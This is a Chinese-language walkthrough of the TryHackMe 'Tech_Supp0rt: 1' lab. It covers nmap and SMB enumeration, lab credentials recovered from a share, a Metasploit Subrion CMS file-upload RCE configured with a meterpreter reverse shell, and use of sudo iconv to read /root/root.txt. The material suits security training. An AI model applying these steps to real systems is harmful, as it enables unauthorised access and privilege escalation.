[THM] Tech_Supp0rt: 1

信息收集

先是查看端口开放情况,主要开放了三个服务,http,ssh,smb

nmap -sV -sC -v 10.48.163.129
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-09 06:09 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating NSE at 06:09
Completed NSE at 06:09, 0.00s elapsed
Initiating Ping Scan at 06:09
Scanning 10.48.163.129 [4 ports]
Completed Ping Scan at 06:09, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:09
Completed Parallel DNS resolution of 1 host. at 06:09, 0.02s elapsed
Initiating SYN Stealth Scan at 06:09
Scanning 10.48.163.129 [1000 ports]
Discovered open port 22/tcp on 10.48.163.129
Discovered open port 80/tcp on 10.48.163.129
Discovered open port 139/tcp on 10.48.163.129
Discovered open port 445/tcp on 10.48.163.129
Completed SYN Stealth Scan at 06:09, 16.08s elapsed (1000 total ports)
Initiating Service scan at 06:09
Scanning 4 services on 10.48.163.129
Completed Service scan at 06:09, 11.70s elapsed (4 services on 1 host)
NSE: Script scanning 10.48.163.129.
Initiating NSE at 06:09
Completed NSE at 06:10, 8.78s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.79s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Nmap scan report for 10.48.163.129
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m30s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2026-02-09T16:39:55+05:30
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-02-09T11:09:56
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

NSE: Script Post-scanning.
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Initiating NSE at 06:10
Completed NSE at 06:10, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds
           Raw packets sent: 1318 (57.968KB) | Rcvd: 1087 (45.000KB)

http服务直接进入就是一个apache2的页面,没啥东西,先用dirsearch扫描一下,看看有没有进一步的目录

test是一堆广告的页面,看来是被攻击了

还有一个wordpress的博客网站

那么自然使用wpscan看看有没有什么东西了,在user模式下的枚举,找到了一个用户support

wpsscan --url http://blog.thm --enumerate u

那么接下来看看smb服务会不会有些东西比如密码啥的泄露吧

这里的smb服务使用nmap扫描看看,发现websvr共享是可以访问的

 kali@kali  ~  sudo nmap -p 445,139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.48.163.129 
[sudo] kali 的密码：
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-09 06:11 EST
Nmap scan report for 10.48.163.129
Host is up (0.19s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.48.163.129\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (TechSupport server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.48.163.129\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.48.163.129\websvr: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\scamsite\websvr
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 33.38 seconds

这里使用smbclient进行连接,找到一个enter.txt文件,下载到本地,看看里面是啥

smbclient //10.48.163.129/websvr
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.       
smb: \> ls
  .                                   D        0  Sat May 29 03:17:38 2021
  ..                                  D        0  Sat May 29 03:03:47 2021
  enter.txt                           N      273  Sat May 29 03:17:38 2021

		8460484 blocks of size 1024. 5671140 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> 

发现这里提示了admin和密码(可能是哈希?),还提示了一个站点/subrion,不过直接访问好像啥都没有,但是又说从panel编辑,拼接之后是/subrion/panel,发现一个登录页面

cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

然后这个admin的哈希放到md5网站发现居然没有,估计不是哈希吗,这里准备去cyberchef尝试破解下,选择的magic模式,居然是好几个base编码,破解到密码

然后成功登录到了Subrion的后台(wordpress那个support账户我也用hydra爆破了,不过没有破解出来,所以利用主要还是看subrion这个cms了吧)

漏洞利用

Subrion CMS 的后台查看到版本是4.2.1,去漏洞网站搜索,找到一个文件上传漏洞感觉可以利用

我这里顺手去看看msfconsole中有没有利用模块,居然真好有这个,版本也是对的

填写对应参数就拿到shell了

msf exploit(multi/http/subrion_cms_file_upload_rce) > show options 

Module options (exploit/multi/http/subrion_cms_file_upload_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Scam2021         yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, socks5, socks5h, http, sapni
   RHOSTS     10.48.163.129    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       Subrion CMS default port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /subrion         yes       Base path
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  					  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

权限提升

拿到shell之后,发现是www-data的身份

上传一个LinEnum.sh看看有没有利用点

找到一个本地的3306端口,感觉可以利用一下mysql服务,然后找到一个账户scamsite,其他好像没啥特别的

不过本地的mysql服务需要密码的,这里想到网站配置文件中可能有

去wordpress目录中查看了wp-config文件,找到账户和密码

不过meterprete的shell不是交互的,导致mysql的也没看出来到底连没连上,也没查看到数据库

后来又想用这密码去试试scamsite的ssh连接,居然连接上了

然后使用sudo -l查看一下账户权限,发现可以无密码使用iconv

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

去GTFO查看一下有没有啥利用手法,发现正好可以读取到文件

最后使用命令,sudo iconv -f 8859_1 -t 8859_1 /root/root.txt,成功拿到flag

总结

后续的怎么拿root权限,我看其他wp基本都是利用iconv写入ssh公钥来登录root的思路